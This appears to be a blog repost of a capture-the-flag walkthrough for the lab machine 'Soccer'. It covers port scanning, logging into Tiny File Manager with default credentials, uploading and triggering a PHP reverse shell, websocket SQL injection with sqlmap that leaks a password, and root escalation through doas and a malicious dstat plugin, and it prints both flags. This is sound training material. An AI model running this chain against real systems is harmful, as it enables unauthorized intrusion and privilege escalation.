Information Gathering

IP Address	Opening Ports
10.10.11.194	TCP:22,80,9091

$ ip='10.10.11.194'; itf='tun0'; if nmap -Pn -sn "$ip" | grep -q "Host is up"; then echo -e "\e[32m[+] Target $ip is up, scanning ports...\e[0m"; ports=$(sudo masscan -p1-65535,U:1-65535 "$ip" --rate=1000 -e "$itf" | awk '/open/ {print $4}' | cut -d '/' -f1 | sort -n | tr '\n' ',' | sed 's/,$//'); if [ -n "$ports" ]; then echo -e "\e[34m[+] Open ports found on $ip: $ports\e[0m"; nmap -Pn -sV -sC -p "$ports" "$ip"; else echo -e "\e[31m[!] No open ports found on $ip.\e[0m"; fi; else echo -e "\e[31m[!] Target $ip is unreachable, network is down.\e[0m"; fi

PORT     STATE SERVICE         VERSION
22/tcp   open  ssh             OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 ad0d84a3fdcc98a478fef94915dae16d (RSA)
|   256 dfd6a39f68269dfc7c6a0c29e961f00c (ECDSA)
|_  256 5797565def793c2fcbdb35fff17c615c (ED25519)
80/tcp   open  http            nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://soccer.htb/
9091/tcp open  xmltec-xmlmail?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Help, RPCCheck, SSLSessionReq, drda, informix: 
|     HTTP/1.1 400 Bad Request
|     Connection: close
|   GetRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 139
|     Date: Mon, 10 Feb 2025 09:01:42 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot GET /</pre>
|     </body>
|     </html>
|   HTTPOptions, RTSPRequest: 
|     HTTP/1.1 404 Not Found
|     Content-Security-Policy: default-src 'none'
|     X-Content-Type-Options: nosniff
|     Content-Type: text/html; charset=utf-8
|     Content-Length: 143
|     Date: Mon, 10 Feb 2025 09:01:43 GMT
|     Connection: close
|     <!DOCTYPE html>
|     <html lang="en">
|     <head>
|     <meta charset="utf-8">
|     <title>Error</title>
|     </head>
|     <body>
|     <pre>Cannot OPTIONS /</pre>
|     </body>
|_    </html>

Tiny 2.4.3

# echo '10.10.11.194 soccer.htb'>>/etc/hosts

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图

$ feroxbuster -u 'http://soccer.htb/'

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图1

http://soccer.htb/tiny/

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图2

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图3

https://github.com/prasathmani/tinyfilemanager

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图4

[admin/admin@123] OR [user/12345]

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图5

http://soccer.htb/tiny/tinyfilemanager.php?p=tiny%2Fuploads&upload

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图6

$ curl http://soccer.htb/tiny/uploads/reverse.php

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图7

Websocket SQLI

www-data@soccer:/$ cat /etc/hosts

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图8

# echo '10.10.11.194 soc-player.soccer.htb'>>/etc/hosts

http://soc-player.soccer.htb/

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图9

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图10

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图11

$ websocat ws://soc-player.soccer.htb:9091

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图12

$ /home/maptnh/sqlmap-dev/sqlmap.py -u 'ws://soc-player.soccer.htb:9091' --data '{"id":"*"}' --batch --level 5 --risk 3 --threads 10 --dbs

username:player
password:PlayerOftheMatch2022

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图13

User.txt

f07036b231022261fd0734ac994534dd

Privilege Escalation:Doas && dstat

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图14

player@soccer:/tmp$ cat /usr/local/etc/doas.conf

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图15

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图16

player@soccer:/tmp$ echo 'import os; os.system("/bin/bash")' > /usr/local/share/dstat/dstat_bash.py

player@soccer:/tmp$ doas /usr/bin/dstat --lis

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图17

player@soccer:/tmp$ doas /usr/bin/dstat --bash

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升插图18

Root.txt

ed0c81afb79ac34cabd884fdc3149dbd

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途，否则一切后果请用户自负。

本站信息来自网络，版权争议与本站无关。您必须在下载后的24个小时之内，从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序，请支持正版，购买注册，得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解！

程序来源网络，不确保不包含木马病毒等危险内容，请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱：4ablog168#gmail.com（#换成@）

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升

Information Gathering

Tiny 2.4.3

Websocket SQLI

User.txt

Privilege Escalation:Doas && dstat

Root.txt

相关文章

发布评论取消回复

[Meachines] [Easy] Soccer Tiny 2.4.3-RCE+WS-SQLI+Doas权限提升+dstat权限提升

Information Gathering

Tiny 2.4.3

Websocket SQLI

User.txt

Privilege Escalation:Doas && dstat

Root.txt

相关文章：

相关文章

发布评论 取消回复

发布评论取消回复